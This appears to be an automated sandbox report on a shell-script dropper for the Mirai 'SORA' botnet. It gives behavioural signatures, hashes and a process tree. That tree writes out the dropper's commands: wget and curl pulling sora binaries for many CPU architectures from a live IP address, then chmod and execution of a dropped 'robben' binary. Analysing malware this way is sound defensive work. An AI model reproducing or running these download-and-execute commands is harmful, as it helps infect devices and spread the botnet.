Analysis
-
max time kernel
150s -
max time network
156s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
03-11-2024 14:37
Static task
static1
Behavioral task
behavioral1
Sample
aws.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
aws.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
aws.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
aws.sh
-
Size
2KB
-
MD5
b9ea41c0744886c9aa436d2560a56f9d
-
SHA1
eab007c33f66384f237c3385f56ad11522778fcd
-
SHA256
03f69bcb2f4e202c7372cf932d65338255201439fe776cd8ac8a9632065555bf
-
SHA512
767eafb58db47b959fa25019f2ecb7bc93d983e84fee08303918b36b9c0034b2675dd6751b66dcf990a80018ae48c25c5789502b385e668cc2b6f96d2dd41889
Malware Config
Extracted
mirai
SORA
Signatures
-
Mirai family
-
Contacts a large (34714) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 752 chmod 786 chmod 806 chmod 826 chmod 836 chmod 849 chmod 877 chmod 745 chmod 763 chmod 769 chmod 842 chmod 861 chmod -
Executes dropped EXE 12 IoCs
ioc pid Process /tmp/robben 746 robben /tmp/robben 753 robben /tmp/robben 764 robben /tmp/robben 770 robben /tmp/robben 787 robben /tmp/robben 807 robben /tmp/robben 827 robben /tmp/robben 837 robben /tmp/robben 843 robben /tmp/robben 850 robben /tmp/robben 863 robben /tmp/robben 878 robben -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben -
resource yara_rule behavioral3/files/fstream-1.dat upx behavioral3/files/fstream-4.dat upx behavioral3/files/fstream-5.dat upx behavioral3/files/fstream-7.dat upx -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself pdpmgk1kica034ncie 753 robben -
description ioc Process File opened for reading /proc/873/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/795/exe robben File opened for reading /proc/834/exe robben File opened for reading /proc/508/exe robben File opened for reading /proc/814/exe robben File opened for reading /proc/824/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/827/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/719/exe robben File opened for reading /proc/742/exe robben File opened for reading /proc/761/exe robben File opened for reading /proc/480/exe robben File opened for reading /proc/510/exe robben File opened for reading /proc/840/exe robben File opened for reading /proc/859/exe robben File opened for reading /proc/711/exe robben File opened for reading /proc/819/exe robben File opened for reading /proc/837/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/870/exe robben File opened for reading /proc/710/exe robben File opened for reading /proc/800/exe robben File opened for reading /proc/846/exe robben File opened for reading /proc/853/exe robben File opened for reading /proc/866/exe robben File opened for reading /proc/716/exe robben File opened for reading /proc/789/exe robben File opened for reading /proc/831/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/791/exe robben File opened for reading /proc/845/exe robben File opened for reading /proc/473/exe robben File opened for reading /proc/714/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/855/exe robben File opened for reading /proc/754/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/852/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/757/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/847/exe robben File opened for reading /proc/691/exe robben File opened for reading /proc/706/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/408/exe robben File opened for reading /proc/815/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/868/exe robben File opened for reading /proc/712/exe robben -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 750 curl 751 cat 748 wget -
Writes file to tmp directory 22 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/sora.mips wget File opened for modification /tmp/sora.mips curl File opened for modification /tmp/sora.x86_64 wget File opened for modification /tmp/sora.arm6 curl File opened for modification /tmp/sora.i686 curl File opened for modification /tmp/sora.arm4 curl File opened for modification /tmp/sora.arm5 wget File opened for modification /tmp/sora.arm7 wget File opened for modification /tmp/sora.x86 wget File opened for modification /tmp/sora.x86 curl File opened for modification /tmp/sora.x86_64 curl File opened for modification /tmp/sora.i686 wget File opened for modification /tmp/sora.ppc wget File opened for modification /tmp/sora.ppc curl File opened for modification /tmp/sora.mpsl curl File opened for modification /tmp/sora.arm7 curl File opened for modification /tmp/sora.ppc440fp curl File opened for modification /tmp/sora.arm6 wget File opened for modification /tmp/robben aws.sh File opened for modification /tmp/sora.i468 curl File opened for modification /tmp/sora.mpsl wget File opened for modification /tmp/sora.arm5 curl
Processes
-
/tmp/aws.sh/tmp/aws.sh1⤵
- Writes file to tmp directory
PID:714 -
/usr/bin/wgetwget http://93.123.85.190/bins/sora.x862⤵
- Writes file to tmp directory
PID:720
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/catcat sora.x862⤵PID:744
-
-
/bin/chmodchmod +x aws.sh robben sora.x862⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:746
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:748
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:750
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:751
-
-
/bin/chmodchmod +x aws.sh robben sora.mips sora.x862⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
- Reads runtime system information
PID:753
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.x86_642⤵
- Writes file to tmp directory
PID:760
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/catcat sora.x86_642⤵PID:762
-
-
/bin/chmodchmod +x aws.sh robben sora.mips sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:764
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.i4682⤵PID:766
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:767
-
-
/bin/catcat sora.i4682⤵PID:768
-
-
/bin/chmodchmod +x aws.sh robben sora.i468 sora.mips sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:770
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.i6862⤵
- Writes file to tmp directory
PID:771
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:776
-
-
/bin/catcat sora.i6862⤵PID:784
-
-
/bin/chmodchmod +x aws.sh robben sora.i468 sora.i686 sora.mips sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:787
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:789
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/catcat sora.mpsl2⤵PID:804
-
-
/bin/chmodchmod +x aws.sh robben sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:807
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm42⤵PID:809
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/catcat sora.arm42⤵PID:825
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:827
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm52⤵
- Writes file to tmp directory
PID:829
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/catcat sora.arm52⤵PID:835
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:837
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm62⤵
- Writes file to tmp directory
PID:839
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:840
-
-
/bin/catcat sora.arm62⤵PID:841
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:843
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm72⤵
- Writes file to tmp directory
PID:846
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/catcat sora.arm72⤵PID:848
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:850
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.ppc2⤵
- Writes file to tmp directory
PID:852
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/catcat sora.ppc2⤵PID:860
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:863
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.ppc440fp2⤵PID:866
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.ppc440fp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/catcat sora.ppc440fp2⤵PID:876
-
-
/bin/chmodchmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/robben./robben aws.exploit2⤵
- Executes dropped EXE
PID:878
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.m68k2⤵PID:881
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
28KB
MD5fa5457b7546c1b7060c30bde3f8649ca
SHA17c75f6463c36eaebc4719f47d8047e5195a85057
SHA256d3f2f30efffec0f49e28199c60b2819a3e831ae0ba920abd2c5ece5e4bfb3adf
SHA512f012d61a479015af70447b1c3bd2a48c2977691f9a180f4f5c3340b034c65d69782299cb8459e92e3a18dcadfa3078c8b1c613593170f9fa95dd53ba36050c21
-
Filesize
28KB
MD5ec332610b0ca5b634c097ed14f42eedc
SHA1abcbd111601f4165c400e9db36fbf20339e37170
SHA2562bfdc588e26d5f6ac54ca3330ced3ab2bfc9bafb98cdd91fd017180dd5848b3a
SHA512f41f54e2aca4a5dfa3d7bcbad45963aa943fa3b6536c34f7c92c7c79894f1009ef5ab13cfed39b74ffc614791b77497689bcbe71edfefecb20497d873c92d1b0
-
Filesize
212B
MD583ab6cd9a67528bbc6f4f360cb7f8d83
SHA107e8f17209e0569aab39f062568ff0090d9b20d4
SHA2563ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435
SHA512171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f
-
Filesize
28KB
MD5d356657b6ea7a715b60217a914eb6ca8
SHA1b276b1a91895c3025e9f9d64227205dac79c8ef6
SHA256b0758e5e7fde30404ec43dd5fba21253735464062e8a10f0876193d18194fe22
SHA5123b0ab5d1282c9d2ea18ed0fc78aeabafde6c16fa094d53d39a67d3316482da0cffa444dd5dc14aeefb547ce2f789480caa5bb514cb4a26787c7441ba8862e262
-
Filesize
51KB
MD5b8cb140290d21f49dd081f126a75b203
SHA1a9735bd0e2dc30f9bf9f41f01f09ef34be2be2cc
SHA256bce1fe24bc80d79c339fa6ef973ac73338716051739b0c26a72c31f33a5e6029
SHA512003309e15087befbc4bde345a9d02b0974f4cbe835275fce367ba000867f1d515cc7c41298a5c8c9321525039fbcc5e29206f28448607c9c3b5325333faa706e
-
Filesize
27KB
MD500eff503439515d9b12b9c068367cb80
SHA182d68f2b1ffca8558458c1b858599542a67d8bbf
SHA2562962b987b00b166299f9a73f7ccb8dc02b4208266465b41f6b1c9c28277d7276
SHA5123800bc5a8f3983fc50813c49c906203af6528ff3eb97b4818a8632085562c25eab1c691edb5dcdc96c8d2c3f25784a41897ec8a52c042d391899a310224d50f5